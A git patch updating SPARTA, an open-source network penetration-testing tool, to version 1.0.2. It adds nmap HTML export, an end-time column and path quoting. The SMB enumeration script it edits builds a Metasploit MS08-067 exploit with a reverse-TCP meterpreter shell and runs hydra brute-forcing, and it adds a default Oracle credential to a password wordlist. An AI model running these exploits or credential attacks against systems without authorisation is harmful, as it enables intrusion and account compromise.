From 7390e80f4da334dcbef06aa0d359068bae248ba7 Mon Sep 17 00:00:00 2001 From: Antonio Quina Date: Tue, 31 Mar 2015 10:55:17 +0100 Subject: [PATCH] Sparta 1.0.2. See changelog. --- CHANGELOG.txt | 11 +++++- README.md | 4 +-- app/auxiliary.py | 11 +++++- app/logic.py | 39 ++++++++++++--------- app/processmodels.py | 50 +++++++-------------------- app/settings.py | 14 ++++---- controller/controller.py | 10 +++--- db/tables.py | 9 ++--- scripts/smbenum.sh | 7 ++-- sparta.py | 14 +++++--- ui/view.py | 19 +++++----- wordlists/oracle-default-userpass.txt | 1 + 12 files changed, 101 insertions(+), 88 deletions(-) diff --git a/CHANGELOG.txt b/CHANGELOG.txt index d5faf4b..0a52ade 100644 --- a/CHANGELOG.txt +++ b/CHANGELOG.txt @@ -7,4 +7,13 @@ SPARTA 1.0.1 (BETA) * fixed a unicode bug (thanks Dmitry Boomov) * fixed another unicode bug in the tool output * fixed bug in the sort function (thanks ad0nis) -* added content to the help menu \ No newline at end of file +* added content to the help menu + +SPARTA 1.0.2 (BETA) +* fixed elixir import issue caused by sqlalchemy Scoped_Session rename +* fixed bug where tool output from automated attacks wasn't being stored correctly (thx jljansen) +* edited smbenum.sh to allow choosing of a network interface (thx adamziaja) +* added exception handling for missing .qss file (thx AlexJuca) +* imported nmap XML files are now saved to tool output folder (thx mcjon3z) +* nmap output is now also stored in HTML (thx mcjon3z) +* added an "end time" column to the process table (thx ad0nis) diff --git a/README.md b/README.md index 2767eff..0b17422 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -SPARTA v1.0.1 BETA (http://sparta.secforce.com) +SPARTA v1.0.2 BETA (http://sparta.secforce.com) == Authors: @@ -28,7 +28,7 @@ Kali (preferred): Ubuntu 12.04+ (untested) - apt-get install python-elixir python-qt4 + apt-get install python-elixir python-qt4 xsltproc Other than these, the following tools are required for SPARTA to have its minimum functionality: - nmap (for adding hosts) diff --git a/app/auxiliary.py b/app/auxiliary.py index 9617aac..a460ab9 100644 --- a/app/auxiliary.py +++ b/app/auxiliary.py @@ -2,7 +2,7 @@ ''' SPARTA - Network Infrastructure Penetration Testing Tool (http://sparta.secforce.com) -Copyright (c) 2014 SECFORCE (Antonio Quina and Leonidas Stavliotis) +Copyright (c) 2015 SECFORCE (Antonio Quina and Leonidas Stavliotis) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. @@ -137,6 +137,15 @@ def checkHydraResults(output): return True, usernames, passwords # returns the lists of found usernames and passwords return False, [], [] +def exportNmapToHTML(filename): + try: + command = 'xsltproc -o ' + str(filename)+'.html ' + str(filename)+ '.xml' + p = subprocess.Popen(command, shell=True) + p.wait() + + except: + print '[-] Could not convert nmap XML to HTML. Try: apt-get install xsltproc' + # this class is used for example to store found usernames/passwords class Wordlist(): def __init__(self, filename): # needs full path diff --git a/app/logic.py b/app/logic.py index 0a1d54c..355f6d7 100644 --- a/app/logic.py +++ b/app/logic.py @@ -2,7 +2,7 @@ ''' SPARTA - Network Infrastructure Penetration Testing Tool (http://sparta.secforce.com) -Copyright (c) 2014 SECFORCE (Antonio Quina and Leonidas Stavliotis) +Copyright (c) 2015 SECFORCE (Antonio Quina and Leonidas Stavliotis) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. @@ -75,9 +75,7 @@ def setStoreWordlistsOnExit(self, flag=True): self.storeWordlists = flag # this function moves the specified tool output file from the temporary 'running' folder to the 'tool output' folder - # TODO: move tool output into right tool folder def moveToolOutput(self, outputFilename): -# try: # first create the tool folder if it doesn't already exist tool = ntpath.basename(ntpath.dirname(str(outputFilename))) @@ -90,6 +88,12 @@ def moveToolOutput(self, outputFilename): shutil.move(str(outputFilename), str(path)) # move all the nmap files (not only the .xml) elif os.path.exists(str(outputFilename)+'.xml') and os.path.exists(str(outputFilename)+'.nmap') and os.path.exists(str(outputFilename)+'.gnmap') and os.path.isfile(str(outputFilename)+'.xml') and os.path.isfile(str(outputFilename)+'.nmap') and os.path.isfile(str(outputFilename)+'.gnmap'): + try: + exportNmapToHTML(str(outputFilename)) + shutil.move(str(outputFilename)+'.html', str(path)) + except: + pass + shutil.move(str(outputFilename)+'.xml', str(path)) shutil.move(str(outputFilename)+'.nmap', str(path)) shutil.move(str(outputFilename)+'.gnmap', str(path)) @@ -101,6 +105,18 @@ def moveToolOutput(self, outputFilename): print '[-] Something went wrong moving the tool output file..' print "[-] Unexpected error:", sys.exc_info()[0] + def copyNmapXMLToOutputFolder(self, file): + try: + path = self.outputfolder+"/nmap" + filename = ntpath.basename(str(file)) + if not os.path.exists(str(path)): + os.makedirs(str(path)) + + shutil.copy(str(file), str(path)) # will overwrite if file already exists + except: + print '[-] Something went wrong copying the imported XML to the project folder.' + print "[-] Unexpected error:", sys.exc_info()[0] + def openExistingProject(self, filename): try: print '[+] Opening project..' @@ -333,23 +349,12 @@ def getHostsAndPortsForServiceFromDB(self, serviceName, filters): return metadata.bind.execute(tmp_query, str(serviceName)).fetchall() - - # this function returns all the processes from the DB - # the showProcesses flag is used to ensure we don't display processes in the process table after we have cleared them or when an existing project is opened. - def getProcessesFromDB_old(self, filters, showProcesses=''): - if showProcesses == '': - tmp_query = ('SELECT process.* FROM db_tables_process AS process group by name') - return metadata.bind.execute(tmp_query).fetchall() - else: - tmp_query = ('SELECT * FROM db_tables_process AS process WHERE process.display=? order by id desc') - return metadata.bind.execute(tmp_query, str(showProcesses)).fetchall() - # this function returns all the processes from the DB # the showProcesses flag is used to ensure we don't display processes in the process table after we have cleared them or when an existing project is opened. # to speed up the queries we replace the columns we don't need by zeros (the reason we need all the columns is we are using the same model to display process information everywhere) def getProcessesFromDB(self, filters, showProcesses=''): if showProcesses == '': # we do not fetch nmap processes because these are not displayed in the host tool tabs / tools - tmp_query = ('SELECT "0", "0", "0", process.name, "0", "0", "0", "0", "0", "0", "0", "0", "0", "0" FROM db_tables_process AS process WHERE process.closed="False" AND process.name!="nmap" group by process.name') + tmp_query = ('SELECT "0", "0", "0", process.name, "0", "0", "0", "0", "0", "0", "0", "0", "0", "0", "0" FROM db_tables_process AS process WHERE process.closed="False" AND process.name!="nmap" group by process.name') result = metadata.bind.execute(tmp_query).fetchall() elif showProcesses == False: # when opening a project, fetch only the processes that have display=false and were not in tabs that were closed by the user @@ -361,7 +366,7 @@ def getProcessesFromDB(self, filters, showProcesses=''): else: # show all the processes in the (bottom) process table (no matter their closed value) tmp_query = ('SELECT * FROM db_tables_process AS process WHERE process.display=? order by id desc') result = metadata.bind.execute(tmp_query, str(showProcesses)).fetchall() - + return result def getHostsForTool(self, toolname, closed='False'): @@ -465,6 +470,8 @@ def storeProcessOutputInDB(self, procId, output): if proc_output: proc_output.output=unicode(output) + proc.endtime = getTimestamp(True) # store end time + if proc.status == "Killed" or proc.status == "Cancelled" or proc.status == "Crashed": # if the process has been killed don't change the status to "Finished" self.db.commit() # new: this was missing but maybe this is important here to ensure that we save the process output no matter what return True diff --git a/app/processmodels.py b/app/processmodels.py index 35b1138..c840496 100644 --- a/app/processmodels.py +++ b/app/processmodels.py @@ -2,7 +2,7 @@ ''' SPARTA - Network Infrastructure Penetration Testing Tool (http://sparta.secforce.com) -Copyright (c) 2014 SECFORCE (Antonio Quina and Leonidas Stavliotis) +Copyright (c) 2015 SECFORCE (Antonio Quina and Leonidas Stavliotis) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. @@ -78,14 +78,16 @@ def data(self, index, role): # this method takes care of how the inform elif column == 9: value = self.__processes[row]['starttime'] elif column == 10: - value = self.__processes[row]['outputfile'] + value = self.__processes[row]['endtime'] elif column == 11: + value = self.__processes[row]['outputfile'] + elif column == 12: value = self.__processes[row]['output'] - elif column == 12: - value = self.__processes[row]['status'] elif column == 13: + value = self.__processes[row]['status'] + elif column == 14: value = self.__processes[row]['closed'] - return value + return value def sort(self, Ncol, order): self.emit(SIGNAL("layoutAboutToBeChanged()")) @@ -112,7 +114,11 @@ def sort(self, Ncol, order): elif Ncol == 9: for i in range(len(self.__processes)): - array.append(self.__processes[i]['starttime']) + array.append(self.__processes[i]['starttime']) + + elif Ncol == 10: + for i in range(len(self.__processes)): + array.append(self.__processes[i]['endtime']) else: for i in range(len(self.__processes)): @@ -127,38 +133,6 @@ def sort(self, Ncol, order): self.emit(SIGNAL("layoutChanged()")) - def sort_old(self, Ncol, order): - self.emit(SIGNAL("layoutAboutToBeChanged()")) - array=[] - - if Ncol == 4: - for i in range(len(self.__processes)): - array.append(self.__processes[i]['tabtitle']) - - if Ncol == 5: - for i in range(len(self.__processes)): - array.append(IP2Int(self.__processes[i]['hostip'])) - - if Ncol == 6: - for i in range(len(self.__processes)): - if self.__processes[i]['port'] == '': - return - else: - array.append(int(self.__processes[i]['port'])) - - if Ncol == 9: - for i in range(len(self.__processes)): - array.append(self.__processes[i]['status']) - - sortArrayWithArray(array, self.__processes) # sort the services based on the values in the array - - if order == Qt.AscendingOrder: # reverse if needed - self.__processes.reverse() - - self.__controller.updateProcessesIcon() # to make sure the progress GIF is displayed in the right place - - self.emit(SIGNAL("layoutChanged()")) - def flags(self, index): # method that allows views to know how to treat each item, eg: if it should be enabled, editable, selectable etc return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable diff --git a/app/settings.py b/app/settings.py index 74157c2..975ca9f 100644 --- a/app/settings.py +++ b/app/settings.py @@ -75,21 +75,21 @@ def createDefaultSettings(self): self.actions.endGroup() self.actions.beginGroup('HostActions') - self.actions.setValue("nmap-fast-tcp", ["Run nmap (fast TCP)", "nmap -Pn -F -T4 -vvvv [IP] -oA [OUTPUT]"]) - self.actions.setValue("nmap-full-tcp", ["Run nmap (full TCP)", "nmap -Pn -sV -sC -O -p- -T4 -vvvvv [IP] -oA [OUTPUT]"]) - self.actions.setValue("nmap-fast-udp", ["Run nmap (fast UDP)", "nmap -n -Pn -sU -F --min-rate=1000 -vvvvv [IP] -oA [OUTPUT]"]) - self.actions.setValue("nmap-udp-1000", ["Run nmap (top 1000 quick UDP)", "nmap -n -Pn -sU --min-rate=1000 -vvvvv [IP] -oA [OUTPUT]"]) - self.actions.setValue("nmap-full-udp", ["Run nmap (full UDP)", "nmap -n -Pn -sU -p- -T4 -vvvvv [IP] -oA [OUTPUT]"]) + self.actions.setValue("nmap-fast-tcp", ["Run nmap (fast TCP)", "nmap -Pn -F -T4 -vvvv [IP] -oA \"[OUTPUT]\""]) + self.actions.setValue("nmap-full-tcp", ["Run nmap (full TCP)", "nmap -Pn -sV -sC -O -p- -T4 -vvvvv [IP] -oA \"[OUTPUT]\""]) + self.actions.setValue("nmap-fast-udp", ["Run nmap (fast UDP)", "nmap -n -Pn -sU -F --min-rate=1000 -vvvvv [IP] -oA \"[OUTPUT]\""]) + self.actions.setValue("nmap-udp-1000", ["Run nmap (top 1000 quick UDP)", "nmap -n -Pn -sU --min-rate=1000 -vvvvv [IP] -oA \"[OUTPUT]\""]) + self.actions.setValue("nmap-full-udp", ["Run nmap (full UDP)", "nmap -n -Pn -sU -p- -T4 -vvvvv [IP] -oA \"[OUTPUT]\""]) self.actions.setValue("unicornscan-full-udp", ["Run unicornscan (full UDP)", "unicornscan -mU -Ir 1000 [IP]:a -v"]) self.actions.endGroup() self.actions.beginGroup('PortActions') self.actions.setValue("banner", ["Grab banner", "bash -c \"echo \"\" | nc -v -n -w1 [IP] [PORT]\"", ""]) self.actions.setValue("nmap", ["Run nmap (scripts) on port", "nmap -Pn -sV -sC -vvvvv -p[PORT] [IP] -oA [OUTPUT]", ""]) - self.actions.setValue("nikto", ["Run nikto", "nikto -o [OUTPUT].txt -p [PORT] -h [IP]", "http,https,ssl,soap,http-proxy,http-alt"]) + self.actions.setValue("nikto", ["Run nikto", "nikto -o \"[OUTPUT].txt\" -p [PORT] -h [IP]", "http,https,ssl,soap,http-proxy,http-alt"]) self.actions.setValue("dirbuster", ["Launch dirbuster", "java -Xmx256M -jar /usr/share/dirbuster/DirBuster-1.0-RC1.jar -u http://[IP]:[PORT]/", "http,https,ssl,soap,http-proxy,http-alt"]) self.actions.setValue("webslayer", ["Launch webslayer", "webslayer", "http,https,ssl,soap,http-proxy,http-alt"]) - self.actions.setValue("whatweb", ["Run whatweb", "whatweb [IP]:[PORT] --color=never --log-brief=[OUTPUT].txt", "http,https,ssl,soap,http-proxy,http-alt"]) + self.actions.setValue("whatweb", ["Run whatweb", "whatweb [IP]:[PORT] --color=never --log-brief=\"[OUTPUT].txt\"", "http,https,ssl,soap,http-proxy,http-alt"]) ### SMB self.actions.setValue("samrdump", ["Run samrdump", "python /usr/share/doc/python-impacket-doc/examples/samrdump.py [IP] [PORT]/SMB", "netbios-ssn,microsoft-ds"]) diff --git a/controller/controller.py b/controller/controller.py index 0a91724..57e4fe4 100644 --- a/controller/controller.py +++ b/controller/controller.py @@ -2,7 +2,7 @@ ''' SPARTA - Network Infrastructure Penetration Testing Tool (http://sparta.secforce.com) -Copyright (c) 2014 SECFORCE (Antonio Quina and Leonidas Stavliotis) +Copyright (c) 2015 SECFORCE (Antonio Quina and Leonidas Stavliotis) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. @@ -22,7 +22,7 @@ class Controller(): # initialisations that will happen once - when the program is launched def __init__(self, view, logic): - self.version = 'SPARTA 1.0.1 (BETA)' # update this everytime you commit! + self.version = 'SPARTA 1.0.2 (BETA)' # update this everytime you commit! self.logic = logic self.view = view self.view.setController(self) @@ -119,6 +119,9 @@ def getPasslistPath(self): def updateOutputFolder(self): self.screenshooter.updateOutputFolder(self.logic.outputfolder+'/screenshots') # update screenshot folder + def copyNmapXMLToOutputFolder(self, filename): + self.logic.copyNmapXMLToOutputFolder(filename) + def isTempProject(self): return self.logic.istemp @@ -640,7 +643,6 @@ def runToolsFor(self, service, ip, port, protocol='tcp'): for tool in self.settings.automatedAttacks: if service in tool[1].split(",") and protocol==tool[2]: - #print '\tFound tool: ' + tool[0] if tool[0] == "screenshooter": url = ip+':'+port self.screenshooter.addToQueue(url) @@ -651,7 +653,7 @@ def runToolsFor(self, service, ip, port, protocol='tcp'): if tool[0] == a[1]: restoring = False tabtitle = a[1]+" ("+port+"/"+protocol+")" - outputfile = self.logic.runningfolder+"/"+getTimestamp()+'-'+a[1]+"-"+ip+"-"+port + outputfile = self.logic.runningfolder+"/"+re.sub("[^0-9a-zA-Z]", "", str(tool[0]))+"/"+getTimestamp()+'-'+a[1]+"-"+ip+"-"+port command = str(a[2]) command = command.replace('[IP]', ip).replace('[PORT]', port).replace('[OUTPUT]', outputfile) diff --git a/db/tables.py b/db/tables.py index 7c6bf02..564cc8a 100644 --- a/db/tables.py +++ b/db/tables.py @@ -2,7 +2,7 @@ ''' SPARTA - Network Infrastructure Penetration Testing Tool (http://sparta.secforce.com) -Copyright (c) 2014 SECFORCE (Antonio Quina and Leonidas Stavliotis) +Copyright (c) 2015 SECFORCE (Antonio Quina and Leonidas Stavliotis) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. @@ -146,7 +146,8 @@ class process(Entity): port=Field(String) protocol=Field(String) command=Field(String) - starttime=Field(String) + starttime=Field(String) + endtime=Field(String) outputfile=Field(String) output=OneToOne('process_output', inverse='process') status=Field(String) @@ -161,13 +162,13 @@ def __init__(self, pid, name, tabtitle, hostip, port, protocol, command, startti self.port=port self.protocol=protocol self.command=command - self.starttime=starttime + self.starttime=starttime + self.endtime='' self.outputfile=outputfile self.output=processOutputId self.status=status self.closed='False' -### new: now storing process output in a different table to speed up things class process_output(Entity): output=Field(Unicode) process=ManyToOne('process') diff --git a/scripts/smbenum.sh b/scripts/smbenum.sh index bce0ac2..34e11b4 100755 --- a/scripts/smbenum.sh +++ b/scripts/smbenum.sh @@ -1,8 +1,10 @@ #!/bin/bash -# smbcheck- This script will enumerate SMB using every tool in the arsenal +# smbenum 0.2 - This script will enumerate SMB using every tool in the arsenal # SECFORCE - Antonio Quina # All credits to Bernardo Damele A. G. for the ms08-067_check.py script +IFACE="eth0" + if [ $# -eq 0 ] then echo "Usage: $0 " @@ -55,7 +57,7 @@ echo $vulnerable if [[ $vulnerable == *"VULNERABLE"* ]] then echo "Oh yeah! The target is vulnerable!" - MYIP=$(ifconfig | grep -Po '.*inet addr:\K[0-9.]*' | head -n1) + MYIP=$(ifconfig $IFACE | awk -F'[: ]+' '/inet addr:/ {print $4}') echo "use exploits/windows/smb/ms08_067_netapi" > /tmp/$IP-netapi.rc echo "set payload windows/meterpreter/reverse_tcp" >> /tmp/$IP-netapi.rc echo "set RHOST $IP" >> /tmp/$IP-netapi.rc @@ -69,7 +71,6 @@ if [[ $vulnerable == *"VULNERABLE"* ]] else echo "The target is NOT vulnerable!" echo -e "\n########## Bruteforcing all users with 'password', blank and username as password" - #hydra -e ns -L /tmp/$IP-users.txt -p password -V $IP smb -t 1 hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1 rm /tmp/$IP-users.txt diff --git a/sparta.py b/sparta.py index 733ddb4..4bc5c09 100755 --- a/sparta.py +++ b/sparta.py @@ -2,7 +2,7 @@ ''' SPARTA - Network Infrastructure Penetration Testing Tool (http://sparta.secforce.com) -Copyright (c) 2014 SECFORCE (Antonio Quina and Leonidas Stavliotis) +Copyright (c) 2015 SECFORCE (Antonio Quina and Leonidas Stavliotis) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. @@ -13,6 +13,7 @@ # check for dependencies first (make sure all non-standard dependencies are checked for here) try: + from sqlalchemy.orm import scoped_session as scoped_session import elixir except: print "[-] Import failed. Elixir library not found. \nTry installing it with: apt-get install python-elixir" @@ -21,7 +22,7 @@ from PyQt4 import QtGui, QtCore, QtWebKit except: print "[-] Import failed. PyQt4 library not found. \nTry installing it with: apt-get install python-qt4" - exit(0) + exit() from app.logic import * from ui.gui import * @@ -74,8 +75,13 @@ def eventFilter(self, receiver, event): MainWindow = QtGui.QMainWindow() ui = Ui_MainWindow() ui.setupUi(MainWindow) - - qss_file = open('./ui/sparta.qss').read() # TODO: error handling? + + try: + qss_file = open('./ui/sparta.qss').read() + except IOError, e: + print "[-] The sparta.qss file is missing. Your installation seems to be corrupted. Try downloading the latest version." + exit(0) + MainWindow.setStyleSheet(qss_file) logic = Logic() # Model prep (logic, db and models) diff --git a/ui/view.py b/ui/view.py index 8c4922b..69e8800 100644 --- a/ui/view.py +++ b/ui/view.py @@ -2,7 +2,7 @@ ''' SPARTA - Network Infrastructure Penetration Testing Tool (http://sparta.secforce.com) -Copyright (c) 2014 SECFORCE (Antonio Quina and Leonidas Stavliotis) +Copyright (c) 2015 SECFORCE (Antonio Quina and Leonidas Stavliotis) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. @@ -164,7 +164,7 @@ def initTables(self): # this function prepares the default settings f # tools table (left) headers = ["Progress","Display","Pid","Tool","Tool","Host","Port","Protocol","Command","Start time","OutputFile","Output","Status"] - setTableProperties(self.ui.ToolsTableView, len(headers), [0,1,2,4,5,6,7,8,9,10,11,12]) + setTableProperties(self.ui.ToolsTableView, len(headers), [0,1,2,4,5,6,7,8,9,10,11,12,13]) # service table (right) headers = ["Host","Port","Port","Protocol","State","HostId","ServiceId","Name","Product","Version","Extrainfo","Fingerprint"] @@ -188,7 +188,8 @@ def initTables(self): # this function prepares the default settings f # process table headers = ["Progress","Display","Pid","Name","Tool","Host","Port","Protocol","Command","Start time","OutputFile","Output","Status"] - setTableProperties(self.ui.ProcessesTableView, len(headers), [1,2,3,6,7,8,10,11]) + #setTableProperties(self.ui.ProcessesTableView, len(headers), [1,2,3,6,7,8,10,11]) + setTableProperties(self.ui.ProcessesTableView, len(headers), [1,2,3,6,7,8,11,12,14]) self.ui.ProcessesTableView.horizontalHeader().resizeSection(0,125) #self.ui.ProcessesTableView.horizontalHeader().resizeSection(4,125) self.ui.ProcessesTableView.horizontalHeader().resizeSection(4,250) @@ -399,6 +400,7 @@ def importNmap(self): self.importProgressWidget.reset('Importing nmap..') self.controller.nmapImporter.setFilename(str(filename)) self.controller.nmapImporter.start() + self.controller.copyNmapXMLToOutputFolder(str(filename)) self.importProgressWidget.show() else: @@ -885,13 +887,13 @@ def updateServiceNamesTableView(self): def updateToolsTableView(self): if self.ui.MainTabWidget.tabText(self.ui.MainTabWidget.currentIndex()) == 'Scan' and self.ui.HostsTabWidget.tabText(self.ui.HostsTabWidget.currentIndex()) == 'Tools': - headers = ["Progress","Display","Pid","Tool","Tool","Host","Port","Protocol","Command","Start time","OutputFile","Output","Status","Closed"] + headers = ["Progress","Display","Pid","Tool","Tool","Host","Port","Protocol","Command","Start time","End time","OutputFile","Output","Status","Closed"] self.ToolsTableModel = ProcessesTableModel(self,self.controller.getProcessesFromDB(self.filters), headers) self.ui.ToolsTableView.setModel(self.ToolsTableModel) self.lazy_update_tools = False # to indicate that it doesn't need to be updated anymore - for i in [0,1,2,4,5,6,7,8,9,10,11,12,13]: # hide some columns + for i in [0,1,2,4,5,6,7,8,9,10,11,12,13,14]: # hide some columns self.ui.ToolsTableView.setColumnHidden(i, True) tools = [] # ensure that there is always something selected @@ -1084,17 +1086,18 @@ def displayAddHostsOverlay(self, display=False): #################### BOTTOM PANEL INTERFACE UPDATE FUNCTIONS #################### def updateProcessesTableView(self): - headers = ["Progress","Display","Pid","Name","Tool","Host","Port","Protocol","Command","Start time","OutputFile","Output","Status","Closed"] + headers = ["Progress","Display","Pid","Name","Tool","Host","Port","Protocol","Command","Start time","End time","OutputFile","Output","Status","Closed"] self.ProcessesTableModel = ProcessesTableModel(self,self.controller.getProcessesFromDB(self.filters, True), headers) self.ui.ProcessesTableView.setModel(self.ProcessesTableModel) - for i in [1,2,3,6,7,8,10,11,13]: # hide some columns + for i in [1,2,3,6,7,8,11,12,14]: # hide some columns self.ui.ProcessesTableView.setColumnHidden(i, True) self.ui.ProcessesTableView.horizontalHeader().resizeSection(0,125) - self.ui.ProcessesTableView.horizontalHeader().resizeSection(4,250) + self.ui.ProcessesTableView.horizontalHeader().resizeSection(4,210) self.ui.ProcessesTableView.horizontalHeader().resizeSection(5,135) self.ui.ProcessesTableView.horizontalHeader().resizeSection(9,165) + self.ui.ProcessesTableView.horizontalHeader().resizeSection(10,165) self.updateProcessesIcon() def updateProcessesIcon(self): diff --git a/wordlists/oracle-default-userpass.txt b/wordlists/oracle-default-userpass.txt index ae7afbf..124b5cf 100644 --- a/wordlists/oracle-default-userpass.txt +++ b/wordlists/oracle-default-userpass.txt @@ -45,6 +45,7 @@ SYS:oracle9 SYS:oracle8i SYS:oracle9i SYSMAN:OEM_TEMP +SYSTEM:SYSTEM SYSTEM::CHANGE_ON_INSTALL SYSTEM:MANAGER TSMSYS:TSMSYS